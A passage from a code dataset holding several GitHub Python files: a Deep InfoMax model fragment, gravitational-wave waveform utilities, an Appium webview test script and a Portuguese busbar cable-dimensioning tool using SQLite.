['concat', 'product'], \"mode should be either concat or product\"\n self.max_t = max_t\n self.encoder = get_encoder(**encoder_params)\n self.g_dim, self.l_dim = self.encoder.output_dim, self.encoder.local_output_dim\n self.global_discr = Discriminator(input_size=(max_t*self.l_dim + self.g_dim), **global_mine_params)\n self.local_discr = Discriminator(input_size=self.g_dim+self.l_dim, **local_mine_params)\n\n def encode(self, x):\n globals_, locals_ = self.encoder(x, return_locals=True)\n return globals_\n\n def forward(self, x):\n g_dim, l_dim = self.g_dim, self.l_dim\n globals_, locals_ = self.encoder(x, return_locals=True)\n b_dim, t_dim, _ = locals_.shape\n # locals_: b , t , f_dim\n # globals_: b , f_dim\n\n # global_MI # sample and concat all local features together and then with the global repr\n idx_t = torch.randint(0, t_dim, size=(b_dim, self.max_t)).sort(dim=1)[0] + \\\n torch.arange(0, b_dim*t_dim, step=t_dim)[:, None]\n locals_sampled_t = locals_.reshape(-1, l_dim)[idx_t.view(-1)].reshape(b_dim, self.max_t * l_dim)\n\n globals_inputs = torch.cat((locals_sampled_t.repeat_interleave(b_dim, dim=0),\n globals_.repeat(b_dim, 1)), dim=-1).reshape(b_dim, b_dim, -1) # b , b\n 
globals_mi = self.global_discr(globals_inputs)\n\n # local MI\n locals_l = locals_.repeat_interleave(b_dim, dim=0)\n globals_l = globals_.repeat(b_dim, 1).unsqueeze(1).expand(b_dim*b_dim, t_dim, g_dim)\n locals_mi = self.local_discr(torch.cat((locals_l, globals_l), dim=-1)).transpose(0, 1) # t , b*b\n locals_mi = locals_mi.reshape(t_dim, b_dim, b_dim)\n\n return globals_, locals_, globals_mi, locals_mi\n\n\nclass DIMModel(pl.LightningModule):\n def __init__(self, encoder_params, local_mine_params, global_mine_params, mode, max_t,\n train_loader, valid_loader, alpha=0., beta=1.0, gamma=0.001, optimizer='Adam', lr=1e-3):\n super().__init__()\n # self.hparams =\n self.network = DIM(encoder_params, local_mine_params, global_mine_params, mode, max_t)\n self.optimizer = optimizer\n self.train_loader = train_loader\n self.valid_loader = valid_loader\n self.lr = lr\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n\n def configure_optimizers(self):\n opt = torch.optim.Adam(self.network.parameters(), lr=self.lr)\n scheduler = ReduceLROnPlateau(opt, patience=5, factor=0.5, min_lr=self.lr/1000)\n return [opt], [scheduler]\n\n @pl.data_loader\n def train_dataloader(self):\n return self.train_loader\n\n @pl.data_loader\n def val_dataloader(self):\n return self.valid_loader\n\n def train_val_step(self, batch, is_train=True):\n # REQUIRED\n n, t = batch.shape\n globals_, _, globals_mi, locals_mi = self.network(batch)\n t_eff = locals_mi.shape[0]\n prior_loss = (globals_ ** 2).sum()\n locals_logsoftmax = nn.LogSoftmax(dim=-1)(locals_mi)\n globals_logsoftmax = nn.LogSoftmax(dim=-1)(globals_mi)\n locals_loss = - locals_logsoftmax.diagonal(dim1=1, dim2=2).mean()\n globals_loss = - globals_logsoftmax.diagonal().mean()\n loss = self.alpha * globals_loss + self.beta * locals_loss + self.gamma * prior_loss\n acc_globals = (torch.argmax(globals_logsoftmax, dim=-1) == torch.arange(n)).float().mean()\n acc_locals = (torch.argmax(locals_logsoftmax, dim=-1) == torch.arange(n).repeat(t_eff, 1)).float().mean()\n tensorboard_logs = dict(prior_loss=prior_loss,\n local_acc=acc_locals, global_acc=acc_globals,\n local_loss=locals_loss, global_loss=globals_loss)\n mode = 'train_' if is_train else 'val_'\n tensorboard_logs[mode+'loss'] = loss\n return {'loss': loss, 'log': tensorboard_logs}\n\n def training_step(self, batch, batch_idx):\n return self.train_val_step(batch, True)\n\n def validation_step(self, batch, batch_idx):\n return self.train_val_step(batch, False)\n\n def validation_end(self, outputs):\n # OPTIONAL, necessary for ckpt\n avg_loss = torch.stack([x['loss'] for x in outputs]).mean()\n return {'val_loss': avg_loss}","repo_name":"prtos/prot_repr","sub_path":"prot_repr/models/dim.py","file_name":"dim.py","file_ext":"py","file_size_in_byte":5387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9808707688","text":"__author__ = 'Yoshinta Setyawati'\n\nfrom numpy import *\nimport h5py\nimport pickle\nimport glob\nimport os\nfrom scipy import interpolate\nfrom pyrex.decor import *\nimport statistics\nimport lal\nfrom scipy.interpolate import InterpolatedUnivariateSpline as spline\n\ndef read_HDF5(file_dir):\n \"\"\"\n Read an HDF5 file.\n Parameters\n ----------\n file_dir : The directory of the file.\n\n Returns\n ------\n f : The read file with keys.\n \"\"\"\n f=h5py.File(file_dir,'r')\n return f\n\ndef write_HDF5(outfname,data_dict):\n \"\"\"\n Write an HDF5 file.\n Parameters\n ----------\n outfname : The directory of the output file.\n 
data_dict : The data variables to be written.\n\n Returns\n ------\n The written file with keys in outfname.\n \"\"\"\n fh5 = h5py.File(outfname, 'w')\n for var in data_dict.keys():\n print(var)\n try:\n print(dtype(data_dict[var][0]),var)\n fh5.create_dataset(var, data = asarray(data_dict[var]))\n except:\n print(type(data_dict[var]),var)\n if type(data_dict[var])!=list:\n if type(data_dict[var])!=str:\n fh5.create_dataset(var, data = asarray(data_dict[var]))\n else:\n asciiList = [n.encode(\"ascii\", \"ignore\") for n in data_dict[var]]\n fh5.create_dataset(var, (len(asciiList),1),'S10', asciiList)\n elif type(data_dict[var][0])==list:\n fh5.create_dataset(var, data = asarray(data_dict[var]))\n else:\n asciiList = [n.encode(\"ascii\", \"ignore\") for n in data_dict[var]]\n fh5.create_dataset(var, (len(asciiList),1),'S10', asciiList)\n fh5.close()\n\ndef read_pkl(file_dir):\n \"\"\"\n Read a pickle file.\n Parameters\n ----------\n file_dir : The directory of the file.\n\n Returns\n ------\n f : The read file with keys.\n \"\"\"\n with open(file_dir, 'rb') as f:\n data = pickle.load(f)\n return data\n\ndef write_pkl(outfname,data_dict):\n \"\"\"\n Write a pickle file.\n Parameters\n ----------\n outfname : The directory of the output file.\n data_dict : The data variables to be written.\n\n Returns\n ------\n The written file with keys in outfname.\n \"\"\"\n\n f = open(outfname,\"wb\")\n pickle.dump(data_dict,f)\n f.close()\n\ndef masses_from_eta(eta,total_mass=50.,**unused):\n \"\"\"\n Computes mass1 and mass2 from eta and total mass.\n\n Parameters\n ----------\n eta : {float}\n Eta = (m1m2)/(m1+m2)**2 of a given system.\n total_m : {float}\n Total mass m1+m2 of the system in MSun.\n\n Returns\n ------\n mass1 and mass2 in MSun.\n \"\"\"\n m1m2_from_eta=eta*total_mass**2\n mass2_from_eta = -(-total_mass+sqrt((total_mass**2)-(4.*m1m2_from_eta)))/2\n mass1_from_eta = -(-total_mass-sqrt((total_mass**2)-(4.*m1m2_from_eta)))/2\n return mass1_from_eta,mass2_from_eta\n\ndef masses_from_q(q,total_mass=50.):\n \"\"\"\n Computes mass1 and mass2 from eta and total mass.\n\n Parameters\n ----------\n q : {float}\n q = m1/m2, where m1>m2.\n total_m : {float}\n Total mass m1+m2 of the system in MSun.\n\n Returns\n ------\n mass1 and mass2 in MSun.\n \"\"\"\n\n mass1 = q/(1+q)*total_mass\n mass2 = total_mass-mass1\n return mass1,mass2\n\ndef check_total_spin(spinx,spiny,spinz):\n \"\"\"\n Check if the spins are reasonable.\n The magnitude of the spin in each body should less than 1.\n sqrt(spin_ix**2+spin_iy**2+spin_iz**2)<1.\n If over than one, will be normalized.\n\n Parameters\n ----------\n spinx: {float}\n Dimensionless spin in x direction.\n spiny: {float}\n Dimensionless spin in y direction.\n spinz: {float}\n Dimensionless spin in z direction.\n\n Returns\n ------\n spinx: {float}\n Normalized dimensionless spin in x direction\n spiny: {float}\n Normalized dimensionless spin in y direction\n spinz: {float}\n Normalized dimensionless spin in z direction\n \"\"\"\n tspin=sqrt(spinx**2+spiny**2+spinz**2)\n if (tspin>1):\n spinx=spinx/(tspin+0.0001)\n spiny=spiny/(tspin+0.0001)\n spinz=spinz/(tspin+0.0001)\n return spinx,spiny,spinz\n\ndef filter_dicts(alldata,key,val,target):\n '''\n Obtain the value of target if the value of key is val in alldata.\n '''\n seen=set()\n return [d[target] for d in alldata if d[key]==val]\n\ndef checkIfDuplicates(listofElems):\n '''\n Check if the given list contains any duplicates.\n '''\n for elem in listofElems:\n if listofElems.count(elem)>1:\n return True\n 
return False\n\ndef checkIfFilesExist(message,dirfile=\"../data/\"):\n '''\n Check if pickle files exist.\n '''\n r=0\n os.chdir(dirfile)\n #print(message)\n for file in glob.glob(\"*.pkl\"):\n #print(file)\n r=r+1\n if r<1:\n error(\"No *pkl files found in \" + str(dirfile) + \" . Please run 'example/traindata.py' to produce the train data.\")\n if r>1:\n error(\"Found \" + str(r) + \"*pkl files in \" + dirfile + \" . Please remove other *pkl files than the training data.\")\n else:\n dfs=dirfile+str(file)\n return dfs\n\ndef interp1D(trainkey,trainval,testkey):\n '''\n Perform 1D interpolation.\n\n Parameters\n ----------\n trainkey: []\n Array of the x interpolation values.\n trainval: []\n Array of the y interpolation values.\n testkey: []\n The position of the new x for interpolation.\n\n Returns\n ------\n result: []\n The interpolated value in 1 dimension.\n\n '''\n newkey,newval=check_duplicate_training(trainkey,trainval)\n\n if testkey<min(trainkey) or testkey>max(trainkey):\n interp=interpolate.interp1d(newkey,newval, fill_value='extrapolate')\n result=interp(testkey)\n else:\n interp=interpolate.interp1d(trainkey,trainval)\n result=interp(testkey)\n return result\n\ndef check_duplicate_training(trainkey,trainval):\n '''\n Check if the training keys have duplicate numbers.\n If so, get its average values before performing interpolation.\n Parameters\n ----------\n trainkey: []\n Array of the x interpolation values.\n trainval: {float}\n Array of the y interpolation values.\n\n Returns\n ------\n newkey: []\n The new x interpolation values (no duplicates).\n newval: []\n The new y interpolation values, average of the old trainval with duplicate trainkey.\n\n '''\n d = {}\n newkey=[]\n newval=[]\n\n for a, b in zip(list(trainkey), list(trainval)):\n d.setdefault(a, []).append(b)\n\n for key in d:\n newkey.append(key)\n newval.append(statistics.median(d[key]))\n return newkey,newval\n\ndef find_Y22(iota,coa_phi):\n '''\n Compute Y_(2,2) of spherical harmonics waveform.\n Source: https://arxiv.org/abs/0709.0093.\n Parameters\n ----------\n iota: {float}\n Inclination angle (rad).\n phi : {float}\n Phase of coalescence (rad).\n\n Returns\n ------\n Y_(2,2) : Spherical harmonics of the l=2, m=2 mode.\n '''\n Y22=sqrt(5./(64*pi))*((1+cos(iota))**2)*exp(2*coa_phi*1j)\n return Y22\n\ndef find_Y2minus2(iota,coa_phi):\n '''\n Compute Y_(2,-2) of spherical harmonics waveform.\n Source: https://arxiv.org/abs/0709.0093.\n Parameters\n ----------\n iota: {float}\n Inclination angle (rad).\n phi : {float}\n Phase of coalescence (rad).\n\n Returns\n ------\n Y_(2,-2) : Spherical harmonics of the l=2, m=2 mode.\n '''\n Y2minus2=sqrt(5./(64*pi))*((1-cos(iota))**2)*exp(-2*coa_phi*1j)\n return Y2minus2\n\ndef NR_amp_scale(total_mass,distance):\n return total_mass*lal.MTSUN_SI*lal.C_SI/(1e6*distance*lal.PC_SI)\n\ndef sanity_modes(t22,amp22_model,phase22_model,h22_model,t2_2,amp2_2_model,phase2_2_model,h2_2_model):\n def interpolate_data(oldtime,newtime,amp,phase,h22):\n interp_amp=spline(oldtime,amp)\n interp_phase=spline(oldtime,phase)\n interp_h_real=spline(oldtime,real(h22))\n interp_h_imag=spline(oldtime,imag(h22))\n newamp=interp_amp(newtime)\n newphase=interp_phase(newtime)\n newh=interp_h_real(newtime)+interp_h_imag(newtime)*1j\n return newamp,newphase,newh\n\n if len(t22)!=len(t2_2):\n tbegin=max(t22[0],t2_2[0])\n tfinal=min(t22[::-1][0],t2_2[::-1][0])\n deltat=min(abs(t22[1]-t22[0]),abs(t2_2[1]-t2_2[0]))\n t_join=arange(tbegin,tfinal,deltat)\n 
amp22_model,phase22_model,h22_model=interpolate_data(t22,t_join,amp22_model,phase22_model,h22_model)\n #elif len(t_join)!=len(t2_2):\n amp2_2_model,phase2_2_model,h2_2_model=interpolate_data(t2_2,t_join,amp2_2_model,phase2_2_model,h2_2_model)\n else:\n t_join=t22\n return t_join,amp22_model,phase22_model,h22_model,t2_2,amp2_2_model,phase2_2_model,h2_2_model\n\ndef freqISCO(total_mass):\n \"\"\"\n Compute ISCO frequency.\n Parameters\n ----------\n total_mass: {float}\n Total mass in MSun.\n\n Returns\n ------\n ISCOfreq : {float}\n ISCO frequency of the system.\n \"\"\"\n ISCOfreq=lal.C_SI**3/(pi*6**(3/2)*lal.G_SI*lal.MSUN_SI*total_mass)\n return ISCOfreq\n\n__all__ = [\"read_HDF5\", \"write_HDF5\", \"read_pkl\",\n \"write_pkl\",\n \"masses_from_eta\", \"masses_from_q\",\n \"check_total_spin\", \"filter_dicts\",\n \"checkIfDuplicates\", \"checkIfFilesExist\",\n \"interp1D\", \"check_duplicate_training\",\n \"find_Y22\", \"find_Y2minus2\",\n \"NR_amp_scale\", \"sanity_modes\",\n \"freqISCO\"]\n","repo_name":"Yoshinta/pyrex","sub_path":"pyrex/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":10177,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"15901049281","text":"\n\nfrom appium.webdriver import Remote\n\n\n\nclass MobileKeys:\n ENTER = 66\n VOLUME_UP = 24\n VOLUME_DOWN = 25\n\n\nif __name__ == '__main__':\n\n caps = {\n \"platformName\": \"Android\",\n # automationName: 平台原生测试框架\n # \"automationName\": \"UiAutomator1\",\n # \"platformVersion\": \"5.1\",\n # \"app\": r\"‪D:\\data\\柠檬班环境\\app测试环境\\环境\\应用apk包\\Future-release-2018.apk\",\n \"deviceName\": \"Android Emulator\",\n \"appActivity\": \"com.xxzb.fenwoo.activity.addition.WelcomeActivity\",\n \"appPackage\": \"com.xxzb.fenwoo\",\n # \"noReset\": \"false\",\n }\n\n driver = Remote(desired_capabilities=caps, command_executor='http://127.0.0.1:4444/wd/hub')\n driver.implicitly_wait(10)\n\n # iframe,web页面的切换\n # driver.switch_to.frame()\n\n#手机的切换\n # 获取所有的上下文。(webview, native) 列表\n driver.contexts\n # webview_name, webview 的名字\n driver.switch_to.context('webview')\n # 进入到 网页。\n\n","repo_name":"change1q2/APP","sub_path":"other/0228_appium九宫格绘制/app九宫格/deom5_混合应用.py","file_name":"deom5_混合应用.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"422458415","text":"import sqlite3\nimport math\n\nfrom sqlite3 import Error\n\ndef create_connection(path):\n connection = None\n try:\n connection = sqlite3.connect(path)\n print(\"Connection to SQLite DB successful\")\n except Error as e:\n print(f\"The error '{e}' occurred\")\n return connection\n\nconnection = create_connection(\"sm_app.sqlite\")\n\ndef execute_query(connection, query):\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n connection.commit()\n print(\"Query executed successfully\")\n except Error as e:\n print(f\"The error '{e}' occurred\")\n\ncreate_users_table = \"\"\"\nCREATE TABLE IF NOT EXISTS cabos (\n id PRIMARY KEY,\n material,\n section,\n perfil,\n condutores,\n maxcurrent,\n tabela,\n peso,\n inercia,\n w\n);\n\"\"\"\nexecute_query(connection, create_users_table) \n\n\ndef execute_read_query(connection, query):\n cursor = connection.cursor()\n result = None\n try:\n cursor.execute(query)\n result = cursor.fetchall()\n return result\n except Error as e:\n print(f\"The error '{e}' occurred\")\n\n\n# Começa a partir daqui\n\nmenu_options = {\n 1: 'Exit',\n 2: 'Ver tabela',\n 3: 
'Calculo Completo',\n 4: 'Adicionar cabo para calculo',\n 5: 'Análise de sensibilidade',\n}\n\ndef print_menu():\n for key in menu_options.keys():\n print (key, '--', menu_options[key] )\n\n# Fim do menu\n#Inicio das estruturas de dados\n\ndef fator_temp(iz, delta1, delta2):\n return iz * math.sqrt(delta1/delta2) \n\ndef fator_alt(iz, h):\n if h<1000:\n iz = iz * 1\n elif h>=1000 and h<2000:\n iz = iz * 1\n elif h>=2000 and h<3000:\n iz = iz * 0.99\n elif h>=3000 and h<4000:\n iz = iz * 0.96 \n else:\n iz = iz * 0.9\n return iz\n\nclass cabolist:\n def __init__(self, id, material, section, perfil, conductors, maxcurrent, tabela, peso, inercia, w, meu_cabo): \n self.id = id\n self.material = material\n self.section = section\n self.perfil = perfil\n self.conductors = conductors\n self.maxcurrent = maxcurrent\n self.tabela = tabela\n self.peso = peso\n self.inercia = inercia\n self.w = w\n self.F=0\n \n if (self.material == 0) | (self.material == 2):\n self.custo = peso*4.20 #(peso/km)*preçoCU\n self.alfa = 0.000017 \n if (self.material == 1) | (self.material == 3):\n self.custo = peso*2.75 #(peso/km)*preçoAL\n self.alfa = 0.000022 \n self.E = 1.2 * 1000000\n L = meu_cabo.l*10\n self.fo = 112 * math.sqrt(10*(self.E*0.01*self.inercia*10000)/(self.peso*0.001*L*L*L*L)) \ndb_cabo_list = []\n\nclass cabo:\n def __init__(self, U, Scc, S, Perf, Cond, Mat, a, t_cc, l, sigma, h, delta1): \n self.U = U\n self.Scc = Scc \n self.S = S\n self.Perf = Perf\n self.Cond = Cond\n self.Mat = Mat\n self.a = a\n self.t_cc = t_cc\n self.l = l\n self.sigma = sigma\n self.X = 1.8\n\n self.Is = self.S / ( 1.732 * self.U )\n delta2=35\n self.Is = fator_temp(self.Is, delta1, delta2)\n self.Is = fator_alt(self.Is, h)\n\n self.Icc = self.Scc / ( 1.732 * self.U )\n self.ich = self.X * 1.41421 * self.Icc * 0.93\n self.fe=2.04*0.01*(self.ich/1000)*(self.ich/1000)*(self.l*0.01)/(self.a*0.01)\n self.mf = (self.fe* self.l)/16\n self.Ith = 0\n self.m = 0\n self.n = 0\n self.varTem=0\n if (self.Mat == 0) or (self.Mat == 2):\n self.e=(1/56)*(1+ (0.004*45))*0.001 \n if (self.Mat == 1) or (self.Mat == 3): #Isso muda pra Aluminio IMPORTANTE\n self.e=(1/34.2)*(1+ (0.004*45))*0.001 #IMPORTANTE MUDAR DEPOIS\n self.U=8.9*0.000001\n self.C=4.1868*93\n self.kLinha = self.e/(self.U*self.C) \n \n \n#meu_cabo = cabo(15000,500000000,1250000,5,1,1,35,0.5,180,1200,0,35)\n#flag = 1 #IMPORTANTE MUDAR DEPOIS\n\ndef show_cable(cable):\n #Apresentação de resultado \n print(\"Cabo de menor secção que cumpre as especificações: \")\n print(\"id = \", cable.id)\n if cable.material == 0:\n print(\"Material = Cobre não pintado\")\n elif cable.material == 1:\n print(\"Material = Cobre pintado\")\n elif cable.material == 2:\n print(\"Material = Aluminio não pintado\")\n elif cable.material == 3:\n print(\"Material = Aluminio pintado\")\n\n print(\"Section = \", cable.section, \"mm^2\")\n\n if cable.perfil == 1:\n print(\"Perfil = Circular\")\n elif cable.perfil == 2:\n print(\"Perfil = Tubular\")\n elif cable.perfil == 3:\n print(\"Perfil = Retangular Horizontal\")\n elif cable.perfil == 4:\n print(\"Perfil = Retangular Vertical\")\n elif cable.perfil == 5:\n print(\"Perfil = U Vertical\")\n elif cable.perfil == 6:\n print(\"Perfil = U Horizontal\")\n print(\"Nº Conductors = \", cable.conductors)\n print(\"Max current in the cable = \", cable.maxcurrent, \"A\")\n print(\"Tabela onde esta = \", cable.tabela)\n print(\"Peso/km = \", cable.peso, \"kg/m\")\n print(\"Inercia = \", cable.inercia, \", cm^4\")\n print(\"Modulo de Flexao = \", cable.w, \"cm^3\")\n 
if cable.fo != 0:\n print(\"Freq de ressonancia: = \", cable.fo, \"Hz\")\n if cable.F != 0:\n print(\"F = \", cable.F, \"kgf\")\n print(\"Fk = \", cable.Fk, \"kgf\")\n print(\"Força exercida sobre os isoladores nas extremidades = \",cable.extremidade, \"kgf\")\n print(\"Força exercida sobre os isoladores intermedios = \",cable.intermedio, \"kgf\")\n if cable.custo != 0:\n print(\"O cabo custa \", round(cable.custo,2),\" euros/m\")\n # Fim da Apresentação de resultado\n\ndef caso():\n # Entrada de dados\n U = int(input('Qual o nivel de tensao: '))\n Scc = int(input('Qual a potencia de cc: '))\n S = int(input('Qual a potencia nominal: '))\n Perf = int(input('Qual o perfil: '))\n Cond = int(input('Quantos condutores: '))\n Mat = int(input('Qual o material (0 - Cu, 1 - Al, 2 - Cu pintado, 3 - Al pintado): '))\n t_cc = float(input('Qual o tempo do cc: '))\n a = float(input('Qual a distancia entre fases: '))\n l = float(input('Qual o comprimento do vao: '))\n sigma = int(input('Qual a carga de seguranca a flexão: '))\n h =int(input('Qual a altitude: ')) \n delta1 =int(input('Qual a temperatura: ')) \n \n # Fim da entrada de dados\n\n # Fase 2 - bersão base - Contas regime permanente\n \n temp = cabo(U, Scc, S, Perf, Cond, Mat, a, t_cc, l, sigma, h, delta1) \n global meu_cabo \n global flag\n meu_cabo = temp\n flag = 1\n\ndef sensibilidade():\n global meu_cabo\n print('Análise de sensibilidade')\n varU = float(input('Variação do nível de tensão (%): '))\n varScc = float(input('Variação da potência de cc (%): '))\n varS = float(input('Variação da potência nominal (%): '))\n varA = float(input('Variação da distância entre fases (%): '))\n U = meu_cabo.U * (1 + varU / 100)\n Scc = meu_cabo.Scc * (1 + varScc / 100)\n S = meu_cabo.S * (1 + varS / 100)\n a = meu_cabo.a * (1 + varA / 100)\n meu_cabo_old = meu_cabo\n meu_cabo = cabo(U, Scc, S, meu_cabo.Perf, meu_cabo.Cond, meu_cabo.Mat, a, meu_cabo.t_cc, meu_cabo.l, meu_cabo.sigma)\n intro()\n permanente()\n cc()\n flexao()\n ressonancia()\n custo()\n esfTer()\n meu_cabo = meu_cabo_old\n\ndef custo(meu_cabo,db_cabo_list):\n global chepest \n chepest = min (db_cabo_list, key=lambda cabolist: cabolist.custo)\n print(\"\\n\\nCUSTO:\")\n show_cable(chepest)\n\ndef ressonancia(meu_cabo,db_cabo_list):\n for elem in db_cabo_list:\n if (elem.fo>45 and elem.fo<55) or (elem.fo>90 and elem.fo<110):\n db_cabo_list.remove(elem)\n\n #the one with less section\n smallest = min (db_cabo_list, key=lambda cabolist: cabolist.section)\n\n #Apresentação de resultado\n print(\"\\n\\nRESSONANCIA:\") \n show_cable(smallest)\n\ndef flexao(meu_cabo,db_cabo_list):\n for elem in db_cabo_list:\n if (elem.w < ((meu_cabo.mf)/meu_cabo.sigma)):\n db_cabo_list.remove(elem)\n \n smallest = min (db_cabo_list, key=lambda cabolist: cabolist.section)\n\n #Apresentação de resultado\n print(\"\\n\\nFLEXAO:\") \n show_cable(smallest)\n\n\ndef lerDB():\n select_cabos = \"SELECT * from cabos\"\n cabos = execute_read_query(connection, select_cabos)\n print(\"\\n\\n\")\n for cabos in cabos:\n print(cabos)\n print(\"\\n\\n\")\n\ndef intro(meu_cabo,db_cabo_list):\n \n\n # search cables in database\n select_cabos = \"SELECT * FROM cabos WHERE perfil = '\"+ str(meu_cabo.Perf) +\".0' AND material = '\"+ str(meu_cabo.Mat) +\".0'\"\n cabos = execute_read_query(connection, select_cabos)\n i=0\n cabo_select = []\n for cabos in cabos:\n cabo_select.append(str(cabos))\n i=i+1\n for i in range(len(cabo_select)):\n word = cabo_select[i].split()\n for y in range(len(word)):\n word[y]=word[y].replace(\"(\",\"\")\n 
word[y]=word[y].replace(\",\",\"\")\n word[y]=word[y].replace(\")\",\"\")\n word[y]=word[y].replace(\"'\",\"\")\n id=int(float(word[0]))\n material= int(float(word[1]))\n section = int(float(word[2]))\n perfil = int(float(word[3]))\n conductor = int(float(word[4]))\n maxcurrent = int(float(word[5]))\n tabela = int(float(word[6]))\n peso = float(word[7])\n inercia = float(word[8])\n w = float(word[9])\n temp = cabolist(id, material, section, perfil, conductor, maxcurrent, tabela, peso, inercia, w, meu_cabo)\n if material == meu_cabo.Mat and perfil == meu_cabo.Perf:\n db_cabo_list.append(temp)\n\ndef permanente(meu_cabo,db_cabo_list):\n for elem in db_cabo_list:\n if elem.maxcurrent < meu_cabo.Is:\n db_cabo_list.remove(elem)\n\n # the one with less section\n smallest = min (db_cabo_list, key=lambda cabolist: cabolist.section)\n\n #Apresentação de resultado\n print(\"PERMANENTE:\") \n show_cable(smallest)\n\n # Fim Contas regime permanente\n print(\"\\n\\n\")\n\ndef cc(meu_cabo,db_cabo_list):\n #Condição de CC\n if (meu_cabo.Mat == 0) | (meu_cabo.Mat == 2):\n #Cobre\n k_linha = 148\n elif (meu_cabo.Mat == 1) | (meu_cabo.Mat == 3):\n #Aluminio\n k_linha = 76\n else:\n print(\"Cabo configurado erradamente, volte a configurar\")\n return 0\n \n if meu_cabo.t_cc >=0 and meu_cabo.t_cc< 0.015: \n n=1\n m=1.5\n elif meu_cabo.t_cc >=0.015 and meu_cabo.t_cc< 0.02:\n n=0.96\n m=1.4\n elif meu_cabo.t_cc >=0.02 and meu_cabo.t_cc< 0.025:\n n=0.98\n m=1.38\n elif meu_cabo.t_cc >=0.025 and meu_cabo.t_cc< 0.03:\n m=1.2\n n=0.98\n elif meu_cabo.t_cc >=0.03 and meu_cabo.t_cc< 0.035:\n n=0.97\n m=1.10\n elif meu_cabo.t_cc >=0.035 and meu_cabo.t_cc< 0.04:\n m=1.10\n n=0.97\n elif meu_cabo.t_cc>=0.04 and meu_cabo.t_cc<0.045:\n m=0.98\n n=0.97\n elif meu_cabo.t_cc>=0.045 and meu_cabo.t_cc<0.05:\n m=0.90\n n=0.97\n elif meu_cabo.t_cc>=0.05 and meu_cabo.t_cc<0.055:\n m=0.8\n n=0.95\n elif meu_cabo.t_cc>=0.055 and meu_cabo.t_cc<0.06:\n m=0.77\n n=0.93\n elif meu_cabo.t_cc>=0.06 and meu_cabo.t_cc<0.065:\n m=0.77\n n=0.93\n elif meu_cabo.t_cc>=0.065 and meu_cabo.t_cc<0.07:\n m=0.7\n n=0.93\n elif meu_cabo.t_cc>=0.07 and meu_cabo.t_cc<0.075:\n m=0.63\n n=0.93\n elif meu_cabo.t_cc>=0.075 and meu_cabo.t_cc<0.08:\n m=0.61\n n=0.93\n elif meu_cabo.t_cc>=0.085 and meu_cabo.t_cc<0.09:\n m=0.6\n n=0.93\n elif meu_cabo.t_cc>=0.09 and meu_cabo.t_cc<0.1:\t\n m=0.6\n n=0.93\n elif meu_cabo.t_cc>=0.1 and meu_cabo.t_cc<0.2:\n m=0.4\n n=0.93\n elif meu_cabo.t_cc>=0.2 and meu_cabo.t_cc<0.3:\n m=0.3\n n=0.92\n elif meu_cabo.t_cc>=0.3 and meu_cabo.t_cc<0.4:\n m=0.18\n n=0.9\n elif meu_cabo.t_cc>=0.4 and meu_cabo.t_cc<0.5:\n m=0.15\n n=0.88\n elif meu_cabo.t_cc>=0.5 and meu_cabo.t_cc<0.6:\n m=0.10\n n=0.87\n elif meu_cabo.t_cc>=0.6 and meu_cabo.t_cc<0.7:\n m=0.08\n n=0.86\n elif meu_cabo.t_cc>=0.7 and meu_cabo.t_cc<0.8:\n m=0.07\n n=0.85\n elif meu_cabo.t_cc>=0.8 and meu_cabo.t_cc<0.9:\n m=0.05\n n=0.84\n elif meu_cabo.t_cc>=0.9 and meu_cabo.t_cc<1.0:\n m=0\n n=0.83\n else:\n m=0\n n=0.6\n \n meu_cabo.m = m\n meu_cabo.n = n\n meu_cabo.Ith = meu_cabo.Icc * math.sqrt(meu_cabo.m+meu_cabo.n)\n Sec_min_cc = meu_cabo.Ith*math.sqrt(meu_cabo.t_cc)/148\n for elem in db_cabo_list:\n if elem.section < Sec_min_cc:\n db_cabo_list.remove(elem)\n \n print(\"CONDIÇÃO DE CC: \")\n smallest = min (db_cabo_list, key=lambda cabolist: cabolist.section)\n show_cable(smallest)\n\n # pra cada valor de db_cabo_list precisa ver se é maior do que a secção\n\ndef esfTer(meu_cabo,db_cabo_list):\n global chepest\n meu_cabo.varTem = (meu_cabo.kLinha * 
(meu_cabo.Ith/chepest.section)*(meu_cabo.Ith/chepest.section)*meu_cabo.t_cc) + 45 \n chepest.F = chepest.section * (chepest.E*0.01) * chepest.alfa * meu_cabo.varTem\n chepest.Fk = (3.14159*3.14159*chepest.E*chepest.inercia/(meu_cabo.l*meu_cabo.l)) \n if chepest.F > chepest.Fk:\n chepest.F = (10*chepest.E*chepest.inercia)/(meu_cabo.l*(1+(chepest.alfa*meu_cabo.varTem))*meu_cabo.l*(1+(chepest.alfa*meu_cabo.varTem)))\n chepest.extremidade = math.sqrt((chepest.F*chepest.F)/4+(meu_cabo.fe*meu_cabo.fe)/4)\n chepest.intermedio = meu_cabo.fe\n print(\"\\n\\nESFORÇO TERMICO:\")\n show_cable(chepest)\n \n\n\nif __name__=='__main__':\n while(True):\n print_menu()\n option = ''\n try:\n option = int(input('Enter your choice: '))\n except:\n print('Wrong input. Please enter a number ...')\n #Check what choice was entered and act accordingly\n if option == 1:\n print('Thanks message before exiting')\n exit()\n elif option == 2:\n lerDB()\n elif option == 3:\n print(\"_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\\n\\n_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\\n\\n\")\n intro(meu_cabo)\n permanente(meu_cabo)\n cc(meu_cabo)\n flexao(meu_cabo)\n ressonancia(meu_cabo)\n custo(meu_cabo)\n esfTer(meu_cabo)\n elif option == 4:\n caso()\n elif option == 5:\n sensibilidade()\n else:\n print('Invalid option. Please enter a number between 1 and 4.')\n\n\n# Não escreve daqui pra baixo\n","repo_name":"PedroSGui/Cable-dimencioning-tool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14675,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34492088581","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 23 15:45:23 2023\n\nfunctions to create, save, and load estimated start line locations, estimated\nfrom the post race GPS points data by finding the timestamp at which the\nsum of the squared velocities of all the runners is minimum.\n\nover many 